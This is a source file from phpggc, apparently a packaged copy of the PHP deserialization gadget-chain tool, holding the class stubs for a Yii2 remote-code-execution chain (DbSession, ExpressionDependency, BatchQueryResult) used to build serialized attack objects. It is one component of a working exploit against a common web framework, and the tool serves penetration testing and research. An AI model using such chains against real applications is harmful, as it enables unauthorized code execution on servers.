Codebase list phpggc / upstream/0.20210218 gadgetchains / Yii2 / RCE / 2 / gadgets.php
upstream/0.20210218

Tree @upstream/0.20210218 (Download .tar.gz)

gadgets.php @upstream/0.20210218raw · history · blame

<?php
namespace yii\web
{
    class DbSession
    {
        public $writeCallback;

        function __construct($writeCallback) {
            $this->writeCallback = $writeCallback;
        }
    }
}

namespace yii\caching
{
    class ExpressionDependency
    {
        public $expression;

        function __construct($expression) {
            $this->expression = $expression;
        }
    }
}

namespace yii\db {
    class BatchQueryResult {
        private $_dataReader;

        function __construct($dataReader) {
            $this->_dataReader = $dataReader;
        }
    }
}

?>